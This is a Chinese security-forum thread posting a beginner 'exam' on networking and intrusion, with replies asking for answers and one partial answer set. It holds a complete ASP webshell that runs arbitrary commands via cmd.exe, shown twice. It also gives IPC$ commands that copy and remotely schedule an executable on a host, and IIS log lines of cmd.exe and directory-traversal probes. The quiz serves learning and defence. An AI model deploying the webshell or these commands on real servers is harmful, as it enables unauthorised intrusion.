菜鸟试卷
一、[url]http://192.168.0.1[/url]
[url]http://xyz.3322.org[/url]
[url]http://3232235521[/url]
三个连接指向同一目标网站,那么它们分别是什么意义?
二、
常用端口识别
20 21 23
25 80 110
139 443 445
三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator”
c:\>net use z: \\211.87.194.121\c$
c:\>net time \\211.87.194.121
c:\>copy abc.exe \\211.87.194.121\admin$\system32
四、
试述下列命令的区别,如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe
五、
W3SVC日志是什么?分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
六、
netstat命令有何作用,举出两个参数进行说明。
七、
试述木马的一些基本特征。
八、
如何利用脚本实现对ftp的自动操作?
九、
下面是一个ASP木马,请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
十、
存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?
那么,如何在不打补丁的情况下避免这种攻击的发生?
十一、OSI模型中哪一层上有协议?分别是什么?
十二、观察ping命令的返回包的TTL值,可以了解到什么?
十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69
请问 这可能是什么样的会话,采用什么协议,进行什么样的作业?
十四、谈谈你对hacker和网络安全的认识
大家积极参与啊!!!
回复 #1 taibai 的帖子
:嘿嘿: :嘿嘿: :嘿嘿: :嘿嘿: 哥哥,你发的帖子好好哦~~~ 谢谢你的支持!你也多发点帖子哦! 不错 多学习下~~~~~~~~~~ :汗:这个试题见多了,哪个强人做个满分答案出来....... 2、3、4、6、7、11、12 这些会做,别的不会给个答案好吗? 支持支持/。 我也支持 看來我真是菜啊,差遠了 支持!日志的不了解,脚本的也不熟,努力ing 一点也不会啊!连菜鸟也不如啊! 就知道第1个 陆游的 真是什么也不明白啊
关于试题
强烈要求公布答案.. 就是,就是。要把全部答案给出来。我们才能学得更多呀。。。大哥。。。。猪猪。,你把答案全都弄出来吧。。。 :猛哭: 偶都不懂~~
真菜~ 只有2、6、7马马虎虎知道点儿...怎么办?!!! 一切开始学起~~支持~~~
多发些自己学习的心得告诉我门 很多不知道答案啊,版主能不能把答案给大家例出来呢 :啊啊啊: :啊啊啊: :啊啊啊: 只会一倆个呀,汗~! 呵呵....
大家加油啊...:哦也: :哦也: :哦也: 只晓得一部分哦........ 菜鸟试卷
一、
[url]http://192.168.0.1[/url]
[url]http://xyz.3322.org[/url]
http://3232235521
三个连接指向同一目标网站,那么它们分别是什么意义?
答 都是同一个DOS动态IP转换玉米服务
二、
常用端口识别
20 21 23
25 80 110
139 443 445
不是很清楚 有几个知道
三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” 空连接到211.87.121 帐户adminXXXXXXX 密码123456
c:\>net use z: \\211.87.194.121\c$ 连接到211.87.194.121的默认共享C盘
c:\>net time \\211.87.194.121 time 不明白
c:\>copy abc.exe \\211.87.194.121\admin$\system32 复制一个abc.exe文件到211.87.194.121的系统目录system32下面
四、
试述下列命令的区别,如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe 好象是一个计划
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe 上面没错的话这个就是XXXXXX
五、
W3SVC日志是什么?分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
不明白
六、
netstat命令有何作用,举出两个参数进行说明。 不知道 想学习下
七、
试述木马的一些基本特征。 影僻性,危险行,有个性
八、
如何利用脚本实现对ftp的自动操作? 不知道
九、
下面是一个ASP木马,请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
不好意思 才疏学浅看不明白
十、
存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?
那么,如何在不打补丁的情况下避免这种攻击的发生?
十一、OSI模型中哪一层上有协议?分别是什么?
十二、观察ping命令的返回包的TTL值,可以了解到什么? 看不怎么明白
十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69
请问 这可能是什么样的会话,采用什么协议,进行什么样的作业? 高手!!!!!!!! :汗: 就这啊!果然是菜鸟该掌握的! 没怎么看懂 路过`` :(*^__^*) 嘻嘻……: 我考进来啦` 路过``
回复 #1 taibai 的帖子
哇!~~~我是菜鸟怎么看的懂啊!来个简单点的:汗: 我是个菜鸟没有什么好的懂但是会一点一点基础
我知道想第三个是ipc的空连接
还有映射 在就好多没有看懂 netstat 是一个查看断口的命令
有很多参数 如 家个an 是可以用数字显示锻口 加a可以显示全部端口
还有一些 算了也不说了 等待 lz把答案公布出来